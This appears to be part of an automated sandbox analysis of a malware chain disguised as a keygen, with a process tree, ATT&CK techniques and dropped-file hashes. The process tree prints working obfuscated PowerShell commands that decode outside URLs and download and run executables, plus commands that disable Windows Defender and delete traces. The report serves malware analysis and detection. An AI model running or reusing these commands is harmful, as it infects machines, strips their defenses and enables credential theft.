                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Blocklisted process makes network request
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:3080
                  • C:\Users\Public\mrp.exe
                    "C:\Users\Public\mrp.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • Modifies registry class
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4916
                    • C:\Windows\SysWOW64\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                      6⤵
                        PID:4156
                        • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                          "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                          7⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Modifies registry class
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5056
                          • C:\Windows\SysWOW64\WScript.exe
                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                            8⤵
                              PID:4580
                              • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                9⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:192
                                • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                  "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                  10⤵
                                  • Executes dropped EXE
                                  PID:4900
                                • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                  "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                  10⤵
                                  • Executes dropped EXE
                                  PID:4608
                            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                              "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                              8⤵
                              • Executes dropped EXE
                              PID:852
                            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                              "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                              8⤵
                              • Executes dropped EXE
                              PID:4080
                            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                              "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                              8⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Checks processor information in registry
                              PID:3640
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c taskkill /pid 3640 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\965968705142967\\* & exit
                                9⤵
                                  PID:4308
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /pid 3640
                                    10⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4756
                          • C:\Users\Public\mrp.exe
                            "C:\Users\Public\mrp.exe"
                            6⤵
                            • Executes dropped EXE
                            PID:4436
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\AACC.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3800
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1492
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout 2
                      3⤵
                      • Delays execution with timeout.exe
                      PID:204
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\AACC.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3500
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                        4⤵
                        • Blocklisted process makes network request
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:3688
                        • C:\Users\Public\izh.exe
                          "C:\Users\Public\izh.exe"
                          5⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious behavior: MapViewOfSection
                          • Suspicious use of SetWindowsHookEx
                          • Suspicious use of WriteProcessMemory
                          PID:5012
                          • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                            6⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Suspicious behavior: MapViewOfSection
                            • Suspicious use of SetWindowsHookEx
                            PID:4304
                            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                              7⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Checks processor information in registry
                              PID:4584
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c taskkill /pid 4584 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\773734615655072\\* & exit
                                8⤵
                                  PID:2072
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /pid 4584
                                    9⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2096
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                              "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                              6⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              • Suspicious behavior: MapViewOfSection
                              • Suspicious use of SetWindowsHookEx
                              PID:4336
                              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                                7⤵
                                • Executes dropped EXE
                                PID:4724
                            • C:\Users\Public\izh.exe
                              "C:\Users\Public\izh.exe"
                              6⤵
                              • Executes dropped EXE
                              PID:3888
                      • C:\Windows\SysWOW64\mshta.exe
                        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\AACC.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                        3⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3632
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                          4⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3304
                  • C:\Windows\SysWOW64\DllHost.exe
                    C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                    1⤵
                      PID:2012
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c start C:\Windows\temp\zeqkckxq.exe
                        2⤵
                          PID:3768
                          • C:\Windows\temp\zeqkckxq.exe
                            C:\Windows\temp\zeqkckxq.exe
                            3⤵
                            • Executes dropped EXE
                            PID:1368
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "powershell" Get-MpPreference -verbose
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1332
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:408
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:688
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4884
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4428
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4972
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4640
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4240
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4592
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2148
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /IM cmstp.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4116

                      Network

                      MITRE ATT&CK Matrix ATT&CK v6

                      Persistence

                      Modify Existing Service

                      1
                      T1031

                      Defense Evasion

                      Modify Registry

                      2
                      T1112

                      Disabling Security Tools

                      2
                      T1089

                      Credential Access

                      Credentials in Files

                      3
                      T1081

                      Discovery

                      Query Registry

                      2
                      T1012

                      System Information Discovery

                      2
                      T1082

                      Collection

                      Data from Local System

                      3
                      T1005

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • C:\ProgramData\freebl3.dll
                      • C:\ProgramData\mozglue.dll
                      • C:\ProgramData\mozglue.dll
                      • C:\ProgramData\msvcp140.dll
                      • C:\ProgramData\nss3.dll
                        MD5

                        bfac4e3c5908856ba17d41edcd455a51

                        SHA1

                        8eec7e888767aa9e4cca8ff246eb2aacb9170428

                        SHA256

                        e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                        SHA512

                        2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                      • C:\ProgramData\nss3.dll
                        MD5

                        bfac4e3c5908856ba17d41edcd455a51

                        SHA1

                        8eec7e888767aa9e4cca8ff246eb2aacb9170428

                        SHA256

                        e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                        SHA512

                        2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                      • C:\ProgramData\softokn3.dll
                      • C:\ProgramData\sqlite3.dll
                      • C:\ProgramData\sqlite3.dll
                      • C:\ProgramData\vcruntime140.dll
                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      • C:\Users\Admin\AppData\Local\Temp\AACC.tmp\Keygen.exe
                      • C:\Users\Admin\AppData\Local\Temp\AACC.tmp\Keygen.exe
                      • C:\Users\Admin\AppData\Local\Temp\AACC.tmp\b.hta
                      • C:\Users\Admin\AppData\Local\Temp\AACC.tmp\b1.hta
                      • C:\Users\Admin\AppData\Local\Temp\AACC.tmp\ba.hta
                      • C:\Users\Admin\AppData\Local\Temp\AACC.tmp\ba1.hta
                      • C:\Users\Admin\AppData\Local\Temp\AACC.tmp\m.hta
                      • C:\Users\Admin\AppData\Local\Temp\AACC.tmp\m1.hta
                      • C:\Users\Admin\AppData\Local\Temp\AACC.tmp\start.bat
                      • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                      • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
                      • C:\Users\Admin\AppData\Local\Temp\Sr924dh6nn.exe
                      • C:\Users\Admin\AppData\Local\Temp\Sr924dh6nn.exe
                      • C:\Users\Admin\AppData\Local\Temp\W388TBxxwG.exe
                        MD5

                        013db621a3351e3fb049efd2ccad79ff

                        SHA1

                        a23394ea54dbc5342a77938a2c285ee616185560

                        SHA256

                        df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                        SHA512

                        1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                      • C:\Users\Admin\AppData\Local\Temp\YA7TKC6dQs.exe
                      • C:\Users\Admin\AppData\Local\Temp\YA7TKC6dQs.exe
                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                      • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                      • C:\Users\Admin\AppData\Local\Temp\rM0UCSAEOw.exe
                      • C:\Users\Admin\AppData\Local\Temp\rM0UCSAEOw.exe
                      • C:\Users\Public\izh.exe
                      • C:\Users\Public\izh.exe
                      • C:\Users\Public\izh.exe
                      • C:\Users\Public\mrp.exe
                      • C:\Users\Public\mrp.exe
                      • C:\Users\Public\mrp.exe
                      • C:\Users\Public\wds.exe
                      • C:\Users\Public\wds.exe
                      • C:\Users\Public\wds.exe
                      • C:\Windows\Temp\zeqkckxq.exe
                        MD5

                        f4b5c1ebf4966256f52c4c4ceae87fb1

                        SHA1

                        ca70ec96d1a65cb2a4cbf4db46042275dc75813b

                        SHA256

                        88e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03

                        SHA512

                        02a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e

                      • C:\Windows\temp\vusrzlue.inf
                      • C:\Windows\temp\zeqkckxq.exe
                        MD5

                        f4b5c1ebf4966256f52c4c4ceae87fb1

                        SHA1

                        ca70ec96d1a65cb2a4cbf4db46042275dc75813b

                        SHA256

                        88e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03

                        SHA512

                        02a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e

                      • \ProgramData\mozglue.dll
                      • \ProgramData\mozglue.dll
                      • \ProgramData\mozglue.dll
                      • \ProgramData\nss3.dll
                        MD5

                        bfac4e3c5908856ba17d41edcd455a51

                        SHA1

                        8eec7e888767aa9e4cca8ff246eb2aacb9170428

                        SHA256

                        e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                        SHA512

                        2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                      • \ProgramData\nss3.dll
                        MD5

                        bfac4e3c5908856ba17d41edcd455a51

                        SHA1

                        8eec7e888767aa9e4cca8ff246eb2aacb9170428

                        SHA256

                        e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                        SHA512

                        2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                      • \ProgramData\nss3.dll
                        MD5

                        bfac4e3c5908856ba17d41edcd455a51

                        SHA1

                        8eec7e888767aa9e4cca8ff246eb2aacb9170428

                        SHA256

                        e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                        SHA512

                        2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                      • \ProgramData\sqlite3.dll
                      • \ProgramData\sqlite3.dll
                      • \ProgramData\sqlite3.dll
                      • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                      • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                      • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
                      • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
                        MD5

                        02cc7b8ee30056d5912de54f1bdfc219

                        SHA1

                        a6923da95705fb81e368ae48f93d28522ef552fb

                        SHA256

                        1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                        SHA512

                        0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                      • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                      • \Users\Admin\AppData\LocalLow\sqlite3.dll
                      • memory/192-248-0x0000000000000000-mapping.dmp
                      • memory/192-250-0x0000000072150000-0x000000007283E000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/192-251-0x0000000000E60000-0x0000000000E61000-memory.dmp
                        Filesize

                        4KB

                      • memory/192-253-0x00000000015B0000-0x00000000015B1000-memory.dmp
                        Filesize

                        4KB

                      • memory/192-274-0x000000000AEE0000-0x000000000AF04000-memory.dmp
                        Filesize

                        144KB

                      • memory/204-16-0x0000000000000000-mapping.dmp
                      • memory/408-392-0x00007FFE0CD40000-0x00007FFE0D72C000-memory.dmp
                        Filesize

                        9.9MB

                      • memory/408-389-0x0000000000000000-mapping.dmp
                      • memory/688-391-0x0000000000000000-mapping.dmp
                      • memory/688-393-0x00007FFE0CD40000-0x00007FFE0D72C000-memory.dmp
                        Filesize

                        9.9MB

                      • memory/744-356-0x0000000000000000-mapping.dmp
                      • memory/744-358-0x0000000070760000-0x0000000070E4E000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/800-296-0x0000000070760000-0x0000000070E4E000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/800-304-0x0000000000EA0000-0x0000000000EA1000-memory.dmp
                        Filesize

                        4KB

                      • memory/800-292-0x0000000000000000-mapping.dmp
                      • memory/800-297-0x00000000007C0000-0x00000000007C1000-memory.dmp
                        Filesize

                        4KB

                      • memory/800-312-0x000000000ACD0000-0x000000000ACD5000-memory.dmp
                        Filesize

                        20KB

                      • memory/800-310-0x000000000AC10000-0x000000000AC22000-memory.dmp
                        Filesize

                        72KB

                      • memory/1332-354-0x0000022B44490000-0x0000022B44491000-memory.dmp
                        Filesize

                        4KB

                      • memory/1332-353-0x0000022B29EC0000-0x0000022B29EC1000-memory.dmp
                        Filesize

                        4KB

                      • memory/1332-352-0x00007FFE0CD40000-0x00007FFE0D72C000-memory.dmp
                        Filesize

                        9.9MB

                      • memory/1332-350-0x0000000000000000-mapping.dmp
                      • memory/1368-347-0x0000000000420000-0x0000000000421000-memory.dmp
                        Filesize

                        4KB

                      • memory/1368-346-0x00007FFE0CD40000-0x00007FFE0D72C000-memory.dmp
                        Filesize

                        9.9MB

                      • memory/1368-343-0x0000000000000000-mapping.dmp
                      • memory/1368-342-0x0000000000000000-mapping.dmp
                      • memory/1416-300-0x0000000000000000-mapping.dmp
                      • memory/1436-3-0x0000000000000000-mapping.dmp
                      • memory/1436-2-0x0000000000000000-mapping.dmp
                      • memory/1492-18-0x0000000000000000-mapping.dmp
                      • memory/1492-28-0x000000006FE20000-0x000000007050E000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/1492-91-0x0000000009C80000-0x0000000009C81000-memory.dmp
                        Filesize

                        4KB

                      • memory/1936-19-0x0000000000000000-mapping.dmp
                      • memory/1936-27-0x000000006FE20000-0x000000007050E000-memory.dmp
                        Filesize

                        6.9MB

                      • memory/2072-231-0x0000000000000000-mapping.dmp
                      • memory/2096-232-0x0000000000000000-mapping.dmp
